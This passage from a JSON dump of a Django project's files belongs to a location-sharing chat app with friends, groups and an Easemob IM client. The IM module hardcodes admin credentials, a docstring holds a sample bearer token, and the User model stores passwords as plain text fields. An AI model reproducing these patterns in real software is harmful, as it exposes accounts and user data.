testUpdateRelation(self):\n\n print \"test update relation\"\n print \"before test\"\n print getRelation(2)\n\n self.friendRelation2['remark'] = \"super God Kun\"\n updateRelation(**self.friendRelation2)\n\n print \"after test\"\n print getRelation(2)"
},
{
"alpha_fraction": 0.6703125238418579,
"alphanum_fraction": 0.6890624761581421,
"avg_line_length": 31.049999237060547,
"blob_id": "4138f74a17dd0b36b9d49b958edcda4bb41ea060",
"content_id": "ffee457594de8ae7302328b8d5721be68b9e331b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 640,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 20,
"path": "/zzc/zzc/urls.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'zzc.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^adam2014/',include('adam2014.urls',namespace=\"adam2014\")),\n # url(r'^media\\/(?P<path>.*)$', 'django.views.media.serve'),\n) \n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# ... the rest of your URLconf goes here ...\n\nurlpatterns += staticfiles_urlpatterns()"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "d23128d2f8aba365bb8d6756d86f0fc24d85fda5",
"content_id": "29f1c9dc9535d9d17673c591a35c71942e2292bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/zzc/adam2014/auth/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n"
},
{
"alpha_fraction": 0.5406538248062134,
"alphanum_fraction": 0.6010058522224426,
"avg_line_length": 36.1875,
"blob_id": "e19cd57eb108f18fcfeed7219f502340b0da9ff3",
"content_id": "3df43cc2c3d8ed03a58db97b14be742c89634081",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 32,
"path": "/zzc/adam2014/DAO/JoinDAO/Group_userDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom django.db import connection\nfrom adam2014.JoinModels import Group_user\n\ndef getGroup_userListView(group_id):\n sql = \"select adam2014_grouprelation.id,adam2014_grouprelation.time,\" \\\n \"adam2014_grouprelation.user_id,adam2014_user.nickname,adam2014_user.photo,adam2014_user.phone,\" \\\n \"adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code\" \\\n \" from adam2014_grouprelation,adam2014_user \" \\\n \"where adam2014_grouprelation.group_id = %s and adam2014_user.id = adam2014_grouprelation.user_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[group_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n GUs= []\n i = 0\n for i in range(len(row)):\n GUs.append(Group_user.Group_user(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8])))\n i+=1\n return GUs\n\n\n\n"
},
{
"alpha_fraction": 0.7536900639533997,
"alphanum_fraction": 0.7702952027320862,
"avg_line_length": 36.379310607910156,
"blob_id": "b0bcd073a26e1ff05d04e2215b30a9af1341b017",
"content_id": "dcc6594857d9b9c973bc311ded6c826d6602b66e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 29,
"path": "/zzc/zzc/wsgi.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWSGI config for zzc project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\n#Calculate the path based on the location of the WSGI script. \napache_configuration= os.path.dirname(__file__) \nproject = os.path.dirname(apache_configuration) \nworkspace = os.path.dirname(project) \nsys.path.append(workspace)\n\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc\\zzc\\zzc')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc\\zzc')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc')\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n# import django.core.handlers.wsgi\n\n# application = django.core.handlers.wsgi.WSGIHandler()\n"
},
{
"alpha_fraction": 0.6146562099456787,
"alphanum_fraction": 0.6241251826286316,
"avg_line_length": 19.743589401245117,
"blob_id": "d8a1d48eb9a52f172928a1a239c99cbd698d0323",
"content_id": "01b37cd1296fa463dffd6e3c1120f6e41b964705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2663,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 117,
"path": "/zzc/adam2014/urls.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# URLconf\nfrom django.conf.urls import patterns ,url ,include\n\nfrom adam2014 import views\n\nurlpatterns = patterns(\"\", \n \turl(r'^hello$',views.helloworld,name='helloworld'),\n\n \t# 手机验证\n \t# GET\n \t# {phonenum, verifycode, .... }\n \turl(r'^register$', views.register, name='register'),\n\n \t# 基本信息\n \t# POST\n \t# {nickname, passoword, sex, age, ...}\n \t#url(r'^register$', views.register, name='register'),\n\n \t# 登陆\n \t# GET\n \t# {phonenum, password}\n \turl(r'^signin$', views.signin, name='signin'),\n\t\n \t# 更新通讯录\n \t# GET\n \t#url(r'^F5contact$', views.F5contact, name='F5contact'),\n\t\n \t# 刷新所有人位置\n \t# GET\n \t#url(r'^F5allPSN$', views.F5allPSN, name='F5allPSN'),\n\t\n \t# 快速获取单人地理位置\n \t# GET\n \t# {id}\n \turl(r'^getPSN$', views.getPSN, name='getPSN'),\n\n \t# 修改个人信息\n \t# POST\n \t# {nickname, sex, age, ....}\n \turl(r'^editinfo$', views.editinfo, name='editinfo'),\n\n \t# 更改头像\n \t# POST\n \turl(r'^editphoto$', views.editphoto, name='editphoto'),\n\n \t# 添加好友\n \t# POST\n \t# {request_user_phone}\n \turl(r'^addfriend$', views.addfriend, name='addfriend'),\n\n\n \t# 确认添加好友\n \t# POST\n \t# {confirmed,request_user_phone,self_user_phone}\n \turl(r'^confirm_addfriend$', views.confirm_addfriend, name='confirm_addfriend'),\n\n \t# 邀请好友\n \t# POST\n \t# {phonenum, name}\n \turl(r'^invitefriend$', views.invitefriend, name='invitefriend'),\n\n \t# 分享位置\n \t# POST\n \t# {PSN}\n \turl(r'^updatePSN$', views.updatePSN, name='updatePSN'),\n\n \t# 修改好友权限\n \t# POST\n \t# {top, block, delete, alias}\n \turl(r'^setfriend$', views.setfriend, name='setfriend'),\n\n # 用户登陆状态的test\n #url(r'^test1$', views.test1, name='test1'),\n # url(r'^test2/$', views.test2, name='test2'),\n # url(r'^test3/$', views.test3, name='test3'),\n # url(r'^test4/$', views.test4, name='test4'),\n\n\n #退出登陆\n # POST\n url(r'^signout', views.signout, name='signout'),\n\n #获得好友列表和好友详细信息,还有用户所加入的群组\n # POST\n url(r'^getFRandGroups', views.getFRandGroups, name='getFRandGroups'),\n\n\n #新建群组\n # POST\n url(r'^newAgroup', views.newAgroup, name='newAgroup'),\n\n #加人入群\n # POST\n url(r'^addUserToGroup', views.addUserToGroup, name='addUserToGroup'),\n\n #用户退群\n # POST\n url(r'^deleteUserToGroup', views.deleteUserToGroup, name='deleteUserToGroup'),\n\n #删除好友\n # POST\n url(r'^deleteFriendRelation', views.deleteFriendRelation, name='deleteFriendRelation'),\n\n\n\n\n\n\n\n\n #readSession\n url(r'^readSession', views.readSession, name='readSession'),\n\n\t)\n\n\n"
},
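As a companion to the route table above, a hedged sketch of calling the register endpoint from outside the project (host and field values are placeholders; the field names come from views.register):

import requests

resp = requests.post('http://localhost:8000/adam2014/register',
                     data={'phone': '13800000000',
                           'password': 'secret',
                           'nickname': 'demo'})
print(resp.json())  # {"result": 1, "id": ...} on success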
{
"alpha_fraction": 0.49236205220222473,
"alphanum_fraction": 0.5047879815101624,
"avg_line_length": 36.81034469604492,
"blob_id": "9683b70a430ba1b807848d4120fd98e3b275e103",
"content_id": "56aee81059d61e8216f6cc159977996da450ad86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8772,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 232,
"path": "/zzc/adam2014/migrations/0001_initial.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AddFriend',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BottlePicture',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('usedTimes', models.IntegerField()),\n ('tookTime', models.DateTimeField()),\n ('author', models.CharField(max_length=32, null=True)),\n ('content', models.TextField()),\n ('longitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('latitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='FriendRelation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ('inBlackList', models.BooleanField(default=None)),\n ('remark', models.CharField(max_length=16)),\n ('top', models.BooleanField(default=None)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=32)),\n ('ucount', models.IntegerField()),\n ('code', models.CharField(max_length=20)),\n ('creater_id', models.IntegerField(null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='GroupMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField()),\n ('group_to', models.ForeignKey(to='adam2014.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='GroupRelation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField()),\n ('group', models.ForeignKey(to='adam2014.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ImmediatelyMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LocationMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(default=datetime.datetime(2014, 12, 5, 1, 57, 55, 585319))),\n ('type', models.IntegerField()),\n ('content_id', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PictureMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 
primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TextMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=16)),\n ('nickname', models.CharField(max_length=32)),\n ('photo', models.TextField()),\n ('phone', models.CharField(max_length=16)),\n ('contacts_version', models.CharField(max_length=15, null=True)),\n ('longitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('latitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('code', models.CharField(max_length=20)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='VoiceMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='locationmessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='immediatelymessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='immediatelymessage',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='grouprelation',\n name='user',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='groupmessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='groupmessage',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='group',\n name='users',\n field=models.ManyToManyField(to='adam2014.User', through='adam2014.GroupRelation'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='friendrelation',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='bottlepicture',\n name='user',\n field=models.ForeignKey(to='adam2014.User', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='addfriend',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n ]\n"
},
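One detail worth flagging in the migration above: Message.time was generated with a frozen default, datetime.datetime(2014, 12, 5, ...), i.e. the timestamp captured when makemigrations ran, so every defaulted row gets that same moment. If a per-row default is wanted, the model should pass a callable instead; a hypothetical model-side fix (not the project's current code):

from django.db import models
import datetime

class Message(models.Model):
    # Passing the callable (no parentheses) makes Django evaluate it per insert.
    time = models.DateTimeField(default=datetime.datetime.now)
    type = models.IntegerField()
    content_id = models.IntegerField()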
{
"alpha_fraction": 0.6830508708953857,
"alphanum_fraction": 0.691525399684906,
"avg_line_length": 21.730770111083984,
"blob_id": "32c62d1588d42975ae7975cc4934052f6b6dd6d0",
"content_id": "8c05fc34a65cd1bf887dacbb7df91662e85e0383",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 26,
"path": "/zzc/adam2014/Service/JoinService/FriendRelationListViewService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import FriendRelationListViewDAO\n\ndef getFriendRelationListView(user_id):\n frs = []\n try:\n frs = FriendRelationListViewDAO.getFriendRelationListView(user_id)\n except:\n pass\n return frs\n\ndef getAfriendRelationView(user_from_id,user_to_id):\n frs = []\n try:\n frs = FriendRelationListViewDAO.getAfriendRelationView(user_from_id,user_to_id)\n except:\n pass\n return frs"
},
{
"alpha_fraction": 0.6033321022987366,
"alphanum_fraction": 0.6083863973617554,
"avg_line_length": 31.14457893371582,
"blob_id": "1cd456cc1adabe350249c4defba2441d3c5a6492",
"content_id": "b8383d850305b9df231d9b362969063bb2e1d94f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6112,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 166,
"path": "/zzc/adam2014/IM/easemob_server_python.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*- \n__author__ = 'lao605'\n\nimport requests\nimport json\nfrom time import time\nfrom requests.auth import AuthBase\nimport string\nimport random\n\nJSON_HEADER = {'content-type': 'application/json',\"Accept\":\"application/json\"}\n# EASEMOB_HOST = \"http://localhost:8080\"#\nEASEMOB_HOST = \"https://a1.easemob.com\"\n\nDEBUG = False\n\ndef parse_appkey(appkey):\n \"\"\"解析appkey, 从中得到org和app, 注意, appkey的规则是 {org}#{app}\"\"\"\n return tuple(appkey.split('#'))\n\ndef post(url, payload, auth=None):\n r = requests.post(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\ndef get(url, auth=None):\n r = requests.get(url, headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\ndef delete(url, auth=None):\n r = requests.delete(url, headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\n\ndef http_result(r):\n if DEBUG:\n error_log = {\n \"method\": r.request.method,\n \"url\": r.request.url,\n \"request_header\": dict(r.request.headers),\n \"response_header\": dict(r.headers),\n \"response\": r.text\n }\n if r.request.body:\n error_log[\"payload\"] = r.request.body\n print json.dumps(error_log)\n\n if r.status_code == requests.codes.ok:\n return True, r.json()\n else:\n return False, r.text\n\nclass Token:\n \"\"\"表示一个登陆获取到的token对象\"\"\"\n def __init__(self, token, exipres_in):\n self.token = token\n self.exipres_in = exipres_in + int(time())\n \n def is_not_valid(self):\n \"\"\"这个token是否还合法, 或者说, 是否已经失效了, 这里我们只需要\n 检查当前的时间, 是否已经比或者这个token的时间过去了exipreis_in秒\n \n 即 current_time_in_seconds < (expires_in + token_acquired_time)\n \"\"\"\n return time() > self.exipres_in\n\nclass EasemobAuth(AuthBase):\n \"\"\"环信登陆认证的基类\"\"\"\n \n# 实现__call__函数,这个类型就成为可调用的。\n# 换句话说,我们可以把这个类的对象当作函数来使用,相当于重载了括号运算符。\n def __call__(self, r):\n # 这个r对应的一个是\n r.headers['Authorization'] = 'Bearer ' + self.get_token()\n return r \n \n def get_token(self):\n \"\"\"在这里我们先检查是否已经获取过token, 并且这个token有没有过期\"\"\"\n if (self.token is None) or (self.token.is_not_valid()):\n self.token = self.acquire_token() #refresh the token\n return self.token.token\n \n def acquire_token(self):\n \"\"\"真正的获取token的方法, 返回值是一个我们定义的Token对象\n 这个留给子类去实现\n \"\"\"\n pass\n \nclass OrgAdminAccountAuth(EasemobAuth):\n \"\"\"使用org的管理员账号和密码来获取token, \n 和上面不同的是, 这里获取的是整个org的管理员账号, \n 所以并没有appkey的概念\n \n 并且, 因为没有appkey的概念, 所以, URL也不相同, \n 这里使用的URL是 https://a1.easemob.com/management/token\n \n 而app级别的token都是从 https://a1.easemob.com/{org}/{app}/token\n 这个URL去获取的\n \"\"\"\n def __init__(self, username, password):\n super(OrgAdminAccountAuth, self).__init__()\n # 相当于执行了\n # self.heade3rs['Authorization'] = 'Bearer ' + OrgAdminAccountAuth.get_token()\n # return self\n self.username = username\n self.password = password\n self.url = EASEMOB_HOST+\"/management/token\"\n self.token = None\n \n def acquire_token(self):\n \"\"\"\n 使用 username / password 来获取token, 具体的REST API为\n \n POST /management/token {'grant_type':'password', 'username':'xxxx', 'password':'xxxxx'}\n \"\"\"\n payload = {'grant_type':'password', 'username': self.username, 'password': self.password}\n success, result = post(self.url, payload)\n if success:\n return Token(result['access_token'], result['expires_in'])\n else:\n # throws exception\n pass\n\ndef register_new_user(org, app, auth, username, password):\n \"\"\"注册新的app用户\n POST /{org}/{app}/users {\"username\":\"xxxxx\", \"password\":\"yyyyy\"}\n \"\"\"\n payload = {\"username\":username, \"password\":password}\n url = EASEMOB_HOST+(\"/%s/%s/users\" % 
(org, app))\n return post(url, payload, auth)\n \ndef delete_user(org, app, auth, username):\n \"\"\"删除app用户\n DELETE /{org}/{app}/users/{username}\n \"\"\"\n url = EASEMOB_HOST+(\"/%s/%s/users/%s\" % (org, app, username))\n return delete(url, auth)\n\ndef send_file(org, app, auth, file_path, secret=True):\n \"\"\"上传文件\n 上传文件\n curl --verbose --header \"Authorization: Bearer YWMtz1hFWOZpEeOPpcmw1FB0RwAAAUZnAv0D7y9-i4c9_c4rcx1qJDduwylRe7Y\" \\\n --header \"restrict-access:true\" --form file=@/Users/stliu/a.jpg \\\n http://a1.easemob.com/easemob-demo/chatdemoui/chatfiles\n \"\"\"\n url = EASEMOB_HOST+(\"/%s/%s/chatfiles\" % (org, app))\n # files = {'file': open(file_path, 'rb')}\n files = {'file': ('report.xls', open(file_path, 'rb'), 'image/jpeg', {'Expires': '0'})}\n\n r = requests.post(url, files=files, auth=auth)\n return http_result(r)\n \n# REST client就是调用REST API的程序端,可以使调用方式有多种:Linux curl、浏览器、编程语言http请求访问实现等.\n# 在调用环信的后台服务之前, 需要先登陆获取token(oauth2.0), 而根据请求发起人的角色不同, 获取token的方式也不同\n\ndef addEasemobUser(username,password):\n org = \"zzc\"\n app = \"zzc\"\n org_admin_username = \"zzcadmin\"\n org_admin_password = \"zzcadmin\"\n org_admin_auth = OrgAdminAccountAuth(org_admin_username, org_admin_password)\n success, result = register_new_user(org, app, org_admin_auth, username, password)\n if success:\n return \"Success\"\n else:\n return \"False\"\n\n \n\n"
},
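The module above already wires the common case through addEasemobUser(); the other helpers use the same org-admin token dance. A hedged sketch of deleting an Easemob user (credentials as in addEasemobUser, the username is a placeholder):

from adam2014.IM.easemob_server_python import OrgAdminAccountAuth, delete_user

auth = OrgAdminAccountAuth('zzcadmin', 'zzcadmin')  # token fetched lazily, cached until it expires
success, result = delete_user('zzc', 'zzc', auth, '111111')
print(success, result)  # (True, {...}) or (False, '<error body>')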
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7242424488067627,
"avg_line_length": 23.481481552124023,
"blob_id": "57e4b3738afa0301c4693f62631fe4727a6d0db9",
"content_id": "8af4ff3dfd714e276cf67cf1bbffb648612c71f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/VoiceMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import VoiceMessage\n# class VoiceMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertVoiceMessage(**voiceMessage):\n v = VoiceMessage.objects.create(**voiceMessage)\n return v;\n\n\ndef deleteVoiceMessage(id):\n VoiceMessage.objects.get(id=id).delete()\n\ndef getVoiceMessageById(id):\n return VoiceMessage.objects.get(id=id)\n\ndef updateVoiceMessage(**kw):\n VoiceMessage.objects.filter(id=kw['id']).update(**kw)"
},
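A short usage sketch of the CRUD helpers above (ids and content are placeholders; note that updateVoiceMessage expects the id inside the kwargs, as its filter(...).update(...) body shows):

from adam2014.DAO.VoiceMessageDAO import *

v = insertVoiceMessage(content='uploads/voice/demo.amr')      # create
updateVoiceMessage(id=v.id, content='uploads/voice/new.amr')  # update
print(getVoiceMessageById(v.id).content)                      # read
deleteVoiceMessage(v.id)                                      # delete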
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6684350371360779,
"avg_line_length": 18.789474487304688,
"blob_id": "6453d428cc697f0b643b2245ac4b3dfec84476f0",
"content_id": "e59cd83b7cc7767d2e7525be2da63fbe1f9d46b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 19,
"path": "/zzc/adam2014/Service/JoinService/Group_userService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import Group_userDAO\n\ndef getGroup_users(group_id):\n group_users = []\n try:\n group_users = Group_userDAO.getGroup_userListView(group_id)\n\n except:\n pass\n return group_users\n\n"
},
{
"alpha_fraction": 0.6232091784477234,
"alphanum_fraction": 0.6479226350784302,
"avg_line_length": 32.638553619384766,
"blob_id": "353f7798ea76089f7df222b27fd167755d606802",
"content_id": "aff11aa6962ee2fbc54c96d7c252898517098bf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2808,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 83,
"path": "/zzc/adam2014/AllTest/DAOTest/testLocationMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n\n__author__ = 'Joe'\n\nfrom django.test import TestCase\nfrom adam2014.DAO.LocationMessageDAO import *\nfrom adam2014.models import LocationMessage\nfrom adam2014.models import Message\n\n\nclass LocationMessageDAOTest(TestCase):\n\n def setUp(self):\n\n # 文字\n self.message1 = {\"id\": 1, \"type\": \"1\", \"content_id\": \"1\"}\n # 图片\n self.message2 = {\"id\": 2, \"type\": \"2\", \"content_id\": \"2\"}\n # 语音\n self.message3 = {\"id\": 3, \"type\": \"3\", \"content_id\": \"3\"}\n # 位置\n self.message4 = {\"id\": 4, \"type\": \"4\", \"content_id\": \"4\"}\n\n self.message1 = Message.objects.create(**self.message1)\n self.message2 = Message.objects.create(**self.message2)\n self.message3 = Message.objects.create(**self.message3)\n self.message4 = Message.objects.create(**self.message4)\n\n self.location_message1 = {\"id\": 1, \"message\": self.message1, \"content\": \"today is a good day\"}\n self.location_message2 = {\"id\": 2, \"message\": self.message2, \"content\": \"today is a bad day\"}\n self.location_message3 = {\"id\": 3, \"message\": self.message3, \"content\": \"today is a rainy day\"}\n\n LocationMessage.objects.create(**self.location_message1)\n LocationMessage.objects.create(**self.location_message2)\n LocationMessage.objects.create(**self.location_message3)\n\n def testInsertLocationMessage(self):\n\n location_message5 = {\"id\": 5, \"message\": self.message4, \"content\": \"today is a coding day\"}\n before = len(LocationMessage.objects.all())\n\n print \"testInsertLocationMessage before:\"\n print(LocationMessage.objects.all())\n\n insertLocationMessage(**location_message5)\n\n after = len(LocationMessage.objects.all())\n print \"testInsertLocationMessage after:\"\n print(LocationMessage.objects.all())\n\n self.assertEqual(after-before, 1)\n\n def testdeleteLocationMessage(self):\n\n print \"before delete: \"\n print len(LocationMessage.objects.all())\n\n deleteLocationMessage(1)\n deleteLocationMessage(2)\n deleteLocationMessage(3)\n\n print \"after delete: \"\n print len(LocationMessage.objects.all())\n\n def testGetLocationMessageById(self):\n\n print(\"testGetLocationMessageById 1&2:\")\n self.assertEqual(getLocationMessageById(1).id, 1)\n print(getLocationMessageById(1))\n self.assertEqual(getLocationMessageById(2).id, 2)\n print(getLocationMessageById(2))\n\n def testUpdateLocationMessageById(self):\n\n print \"Before update: \"\n print getLocationMessageById(1)\n\n self.location_message1['content'] = \"hello, am i handsome?\"\n\n updateLocationMessage(**self.location_message1)\n\n print \"After update: \"\n print getLocationMessageById(1)\n"
},
{
"alpha_fraction": 0.6691792011260986,
"alphanum_fraction": 0.6800670027732849,
"avg_line_length": 23.8125,
"blob_id": "02566055992a5774c7d5e629030e1a3547e0f797",
"content_id": "59caf48971f7b700077cac089489ae3e05ddb682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1250,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 48,
"path": "/zzc/adam2014/Service/AddFriendService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
